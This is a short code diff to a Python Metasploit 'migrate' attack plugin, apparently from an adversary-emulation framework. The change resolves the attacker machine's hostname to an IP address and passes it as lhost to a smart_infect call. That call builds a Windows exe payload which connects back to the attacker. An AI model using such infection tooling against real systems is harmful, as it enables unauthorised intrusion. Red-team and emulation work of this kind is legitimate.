|
|
|
@ -4,6 +4,7 @@
|
|
|
|
|
|
|
|
|
|
|
|
from plugins.base.attack import AttackPlugin
|
|
|
|
from plugins.base.attack import AttackPlugin
|
|
|
|
from app.metasploit import MetasploitInstant
|
|
|
|
from app.metasploit import MetasploitInstant
|
|
|
|
|
|
|
|
import socket
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class MetasploitMigratePlugin(AttackPlugin):
|
|
|
|
class MetasploitMigratePlugin(AttackPlugin):
|
|
|
|
@ -36,11 +37,13 @@ class MetasploitMigratePlugin(AttackPlugin):
|
|
|
|
attacker=self.attacker_machine_plugin,
|
|
|
|
attacker=self.attacker_machine_plugin,
|
|
|
|
username=self.metasploit_user)
|
|
|
|
username=self.metasploit_user)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
|
|
|
|
|
|
|
|
|
|
|
|
metasploit.smart_infect(target,
|
|
|
|
metasploit.smart_infect(target,
|
|
|
|
payload=payload_type,
|
|
|
|
payload=payload_type,
|
|
|
|
architecture="x64",
|
|
|
|
architecture="x64",
|
|
|
|
platform="windows",
|
|
|
|
platform="windows",
|
|
|
|
lhost=self.attacker_machine_plugin.get_ip(),
|
|
|
|
lhost=ip,
|
|
|
|
format="exe",
|
|
|
|
format="exe",
|
|
|
|
outfile=payload_name
|
|
|
|
outfile=payload_name
|
|
|
|
)
|
|
|
|
)
|
|
|
|
|